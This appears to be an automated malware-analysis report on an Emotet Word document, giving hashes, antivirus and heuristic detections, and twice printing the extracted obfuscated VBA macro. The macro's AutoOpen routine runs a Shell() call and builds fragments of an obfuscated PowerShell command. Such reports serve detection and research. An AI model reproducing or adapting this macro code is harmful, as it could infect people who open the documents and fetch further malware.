Emotet Office (OLE) malware analysis — malicious · d3e83cbfe2cfb722

MALICIOUS

Office (OLE)

246.5 KB Created: 2018-06-29 18:02:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: bf109f9c883eb590ab6c884e49529472 SHA-1: 63264e53a823a0c8870f65a6e00d8caeb2702710 SHA-256: d3e83cbfe2cfb722b4b109ac53f7af3d532fc9faf1f4affffd4efaab93cc6968

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6877384-0', strongly suggesting the Emotet family. Critical heuristics indicate the presence of a VBA macro that utilizes the Shell() function, a common technique for executing arbitrary commands. The AutoOpen macro is present and configured to execute code, likely to download and run a second-stage payload.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6877384-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877384-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15489 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15489 bytes
SHA-256: `4c3d365ad4ef49ba16d5b7c34921b94c7f0ef534c8798fc19584ebd0d19cd022`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "SjJPQHzKnhUK" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "mkzruoFud" Function RczOMDprk() On Error Resume Next EPHQRz = BGsDJA - sQEtPo / (AJoHO + Oct(hiMWi) - 48804 + Log(AktWbC)) mWRKLT = XdEGzV = 74682 / zRKXj + 69175 / ChrW(33302) / MLKjsW + ChrW(dzLGio) * 59074 + ChrB(84219 * CInt(rmPVo) * 15030 - Hex(DPbZHc)) + TCVnEz - Int(msAjb) * (mOHMS - tjzUv) HOGGjkzSW = pPYzt + Chr(zJkjw + vbKeyP + pPfssjkVW) + "owe" + "rs" RsidwU = AMftrp - zvbArh / (JVrpmP + Oct(jivvV) - 93574 + Log(MovJZr)) ZAtKwM = hcbDFG = 62070 / FSICq + 13840 / ChrW(34906) / VVkGZI + ChrW(iSMzn) * 99506 + ChrB(30790 * CInt(JCOAGk) * 35813 - Hex(SNvibN)) + LkHFY - Int(NFSYFt) * (sJsEpo - zcGMKD) AVXDNv = YpzSR - jUQhLD / (BObTYr + Oct(wMfbY) - 21044 + Log(brECoW)) wMKzzC = hiLTV = 15743 / XmnJF + 39919 / ChrW(33751) / kwWsAk + ChrW(jqRps) * 24698 + ChrB(16338 * CInt(snMWBz) * 68687 - Hex(zonoBI)) + TXaNc - Int(bGBSa) * (VBjQvP - vVswP) RczOMDprk = wMXblzRBj + HOGGjkzSW + ziHhEM + wHYWAWbum + IPzkdsIjn + wVrvzYMWjti TbQjZO = MHFhtM - rlhUL / (QjlPo + Oct(kbBRqT) - 27119 + Log(CFDIBQ)) ajDOw = jlioju = 77251 / mtEfWW + 16963 / ChrW(22314) / WuGVE + ChrW(MiXhGb) * 65201 + ChrB(46505 * CInt(ZuqKh) * 82397 - Hex(dWvpzA)) + RzMOV - Int(TsafIR) * (JNiHE - wFbjw) End Function Sub AutoOpen() On Error Resume Next iPOEuW = MCIwSR - QqaJEH / (vXrVHF + Oct(SZARUP) - 21710 + Log(uPoWA)) ECEjou = iNYHVz = 25936 / qBvkdE + 22751 / ChrW(81029) / NfbJl + ChrW(ZSuYLi) * 62644 + ChrB(68062 * CInt(tswnsj) * 96548 - Hex(XPPCN)) + mZsMq - Int(JTisf) * (oaZCIJ - vqlHY) Application.Run "tXtBE", RczOMDprk iSvqD = XfUdC - zuXAc / (wEETts + Oct(BYTji) - 48667 + Log(Mpcbqw)) mSajqT = EQbDR = 5938 / sWinRv + 88297 / ChrW(55593) / jwCfO + ChrW(LVhHHJ) * 10152 + ChrB(33477 * CInt(QljNJZ) * 28376 - Hex(MbKYj)) + EEsJK - Int(loomIE) * (VKvam - wWfLj) End Sub Function tXtBE(VFDfG) On Error Resume Next QjFuWG = JlCmMm - JFBAU / (cbqff + Oct(jFEOU) - 80474 + Log(SPjUqP)) jlZlsH = ashwuh = 28426 / PPYCZC + 60015 / ChrW(8220) / qDJBKS + ChrW(KiNNSf) * 64800 + ChrB(2474 * CInt(iaflnk) * 83902 - Hex(kaMCnY)) + Ehdvow - Int(QakmPU) * (IjhXR - czSIFM) ZVrzDM = qjXbRz - Jlufp / (Cqpjfz + Oct(DEhECi) - 89066 + Log(dHcIqz)) prXhv = ioStR = 15383 / pCotZO + 1487 / ChrW(48825) / EWhwk + ChrW(mdlKl) * 22077 + ChrB(64929 * CInt(EJjUrr) * 75929 - Hex(zMFnQ)) + nubOjQ - Int(AzwZLC) * (IGWZHR - jpuJhl) sRhAfKRLaR = zsjCzqS + Shell(doqLiRqY + VFDfG + dzCuYaIPTts, 280621376 - 280621376) + ksbDkEmXw Ovzihh = SfkDw - JnOFj / (BUSBz + Oct(JTjfIG) - 90624 + Log(pKGRW)) XzzpT = ZEzirn = 81630 / fLRDVl + 72152 / ChrW(4133) / YmDbf + ChrW(SXzwkT) * 81972 + ChrB(65954 * CInt(fJdzha) * 20547 - Hex(DtwwKE)) + OjVhY - Int(QEubj) * (spFOo - bYLHlU) End Function Function ziHhEM() On Error Resume Next bAdvsf = YamRLh - hvLNo / (NdWHim + Oct(EWViqP) - 22179 + Log(kaDLHS)) niFXR = Riaro = 90946 / GnAWO + 54557 / ChrW(67274) / jrHpH + ChrW(TAVGR) * 738 + ChrB(20516 * CInt(baumc) * 9970 - Hex(rLbQh)) + CpnEk - Int(wDnwh) * (GzhEl - uMoLa) CdIPikK = "hell" + " & " + Chr(40) + " " + Chr(40) + "[s" + "TrInG]$ve" + "rBOsEPre" + "FeRe" + "Nce" + Chr(41) + "[" + "1,3]" + Chr(43) + "'" + "x'-j" JiZvqQ = wdTzQ - XlPhVt / (ibdmZi + Oct(rPpdZ) - 86228 + Log(uwaOB)) jTfWW = pzAaXz = 28510 / dWMFEb + 5683 / ChrW(10221) / bvWZz + ChrW(HCjJE) * 88796 + ChrB(4219 * CInt(MPrOWU) * 14597 - Hex(RwiGE)) + FCqFdP - Int(aAKsd) * (YqoJEb - ApNNjk) rjWvVBjdsR = "oiN''" + Chr(41) + Chr(40) + "[" + "STrINg]::" + "join" + Chr(40) + " '" + "'," + Chr(40) + " " + "[cHAr[]" + "]" + Chr(40) + "12" + "7,30,40," + " 2 , 10" + "2 , 53" + " , 62 ," XRzriE = nMPtAY - YwKodr / (RvBDv + Oct(fazuC) - 56207 + Log(RpFEu)) ccNUK = pWPajr = 74999 / NhBmV + 23988 / ChrW(11449) / joqZX + ChrW(cooST) * 60673 + ChrB(99178 * CInt(OIclo) * 77636 - Hex(pJlmjG)) + vntpH - Int(vZikQ) * ... (truncated)

SHA-256: 4c3d365ad4ef49ba16d5b7c34921b94c7f0ef534c8798fc19584ebd0d19cd022

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "SjJPQHzKnhUK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mkzruoFud"
Function RczOMDprk()
On Error Resume Next
EPHQRz = BGsDJA - sQEtPo / (AJoHO + Oct(hiMWi) - 48804 + Log(AktWbC))
mWRKLT = XdEGzV = 74682 / zRKXj + 69175 / ChrW(33302) / MLKjsW + ChrW(dzLGio) * 59074 + ChrB(84219 * CInt(rmPVo) * 15030 - Hex(DPbZHc)) + TCVnEz - Int(msAjb) * (mOHMS - tjzUv)
HOGGjkzSW = pPYzt + Chr(zJkjw + vbKeyP + pPfssjkVW) + "owe" + "rs"
RsidwU = AMftrp - zvbArh / (JVrpmP + Oct(jivvV) - 93574 + Log(MovJZr))
ZAtKwM = hcbDFG = 62070 / FSICq + 13840 / ChrW(34906) / VVkGZI + ChrW(iSMzn) * 99506 + ChrB(30790 * CInt(JCOAGk) * 35813 - Hex(SNvibN)) + LkHFY - Int(NFSYFt) * (sJsEpo - zcGMKD)
AVXDNv = YpzSR - jUQhLD / (BObTYr + Oct(wMfbY) - 21044 + Log(brECoW))
wMKzzC = hiLTV = 15743 / XmnJF + 39919 / ChrW(33751) / kwWsAk + ChrW(jqRps) * 24698 + ChrB(16338 * CInt(snMWBz) * 68687 - Hex(zonoBI)) + TXaNc - Int(bGBSa) * (VBjQvP - vVswP)
RczOMDprk = wMXblzRBj + HOGGjkzSW + ziHhEM + wHYWAWbum + IPzkdsIjn + wVrvzYMWjti
TbQjZO = MHFhtM - rlhUL / (QjlPo + Oct(kbBRqT) - 27119 + Log(CFDIBQ))
ajDOw = jlioju = 77251 / mtEfWW + 16963 / ChrW(22314) / WuGVE + ChrW(MiXhGb) * 65201 + ChrB(46505 * CInt(ZuqKh) * 82397 - Hex(dWvpzA)) + RzMOV - Int(TsafIR) * (JNiHE - wFbjw)
End Function
Sub AutoOpen()
On Error Resume Next
iPOEuW = MCIwSR - QqaJEH / (vXrVHF + Oct(SZARUP) - 21710 + Log(uPoWA))
ECEjou = iNYHVz = 25936 / qBvkdE + 22751 / ChrW(81029) / NfbJl + ChrW(ZSuYLi) * 62644 + ChrB(68062 * CInt(tswnsj) * 96548 - Hex(XPPCN)) + mZsMq - Int(JTisf) * (oaZCIJ - vqlHY)
Application.Run "tXtBE", RczOMDprk
iSvqD = XfUdC - zuXAc / (wEETts + Oct(BYTji) - 48667 + Log(Mpcbqw))
mSajqT = EQbDR = 5938 / sWinRv + 88297 / ChrW(55593) / jwCfO + ChrW(LVhHHJ) * 10152 + ChrB(33477 * CInt(QljNJZ) * 28376 - Hex(MbKYj)) + EEsJK - Int(loomIE) * (VKvam - wWfLj)
End Sub
Function tXtBE(VFDfG)
On Error Resume Next
QjFuWG = JlCmMm - JFBAU / (cbqff + Oct(jFEOU) - 80474 + Log(SPjUqP))
jlZlsH = ashwuh = 28426 / PPYCZC + 60015 / ChrW(8220) / qDJBKS + ChrW(KiNNSf) * 64800 + ChrB(2474 * CInt(iaflnk) * 83902 - Hex(kaMCnY)) + Ehdvow - Int(QakmPU) * (IjhXR - czSIFM)
ZVrzDM = qjXbRz - Jlufp / (Cqpjfz + Oct(DEhECi) - 89066 + Log(dHcIqz))
prXhv = ioStR = 15383 / pCotZO + 1487 / ChrW(48825) / EWhwk + ChrW(mdlKl) * 22077 + ChrB(64929 * CInt(EJjUrr) * 75929 - Hex(zMFnQ)) + nubOjQ - Int(AzwZLC) * (IGWZHR - jpuJhl)
sRhAfKRLaR = zsjCzqS + Shell(doqLiRqY + VFDfG + dzCuYaIPTts, 280621376 - 280621376) + ksbDkEmXw
Ovzihh = SfkDw - JnOFj / (BUSBz + Oct(JTjfIG) - 90624 + Log(pKGRW))
XzzpT = ZEzirn = 81630 / fLRDVl + 72152 / ChrW(4133) / YmDbf + ChrW(SXzwkT) * 81972 + ChrB(65954 * CInt(fJdzha) * 20547 - Hex(DtwwKE)) + OjVhY - Int(QEubj) * (spFOo - bYLHlU)
End Function

Function ziHhEM()
On Error Resume Next
bAdvsf = YamRLh - hvLNo / (NdWHim + Oct(EWViqP) - 22179 + Log(kaDLHS))
niFXR = Riaro = 90946 / GnAWO + 54557 / ChrW(67274) / jrHpH + ChrW(TAVGR) * 738 + ChrB(20516 * CInt(baumc) * 9970 - Hex(rLbQh)) + CpnEk - Int(wDnwh) * (GzhEl - uMoLa)
CdIPikK = "hell" + "  & " + Chr(40) + " " + Chr(40) + "[s" + "TrInG]$ve" + "rBOsEPre" + "FeRe" + "Nce" + Chr(41) + "[" + "1,3]" + Chr(43) + "'" + "x'-j"
JiZvqQ = wdTzQ - XlPhVt / (ibdmZi + Oct(rPpdZ) - 86228 + Log(uwaOB))
jTfWW = pzAaXz = 28510 / dWMFEb + 5683 / ChrW(10221) / bvWZz + ChrW(HCjJE) * 88796 + ChrB(4219 * CInt(MPrOWU) * 14597 - Hex(RwiGE)) + FCqFdP - Int(aAKsd) * (YqoJEb - ApNNjk)
rjWvVBjdsR = "oiN''" + Chr(41) + Chr(40) + "[" + "STrINg]::" + "join" + Chr(40) + " '" + "'," + Chr(40) + " " + "[cHAr[]" + "]" + Chr(40) + "12" + "7,30,40," + " 2 , 10" + "2 , 53" + " , 62 ,"
XRzriE = nMPtAY - YwKodr / (RvBDv + Oct(fazuC) - 56207 + Log(RpFEu))
ccNUK = pWPajr = 74999 / NhBmV + 23988 / ChrW(11449) / joqZX + ChrW(cooST) * 60673 + ChrB(99178 * CInt(OIclo) * 77636 - Hex(pJlmjG)) + vntpH - Int(vZikQ) * 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.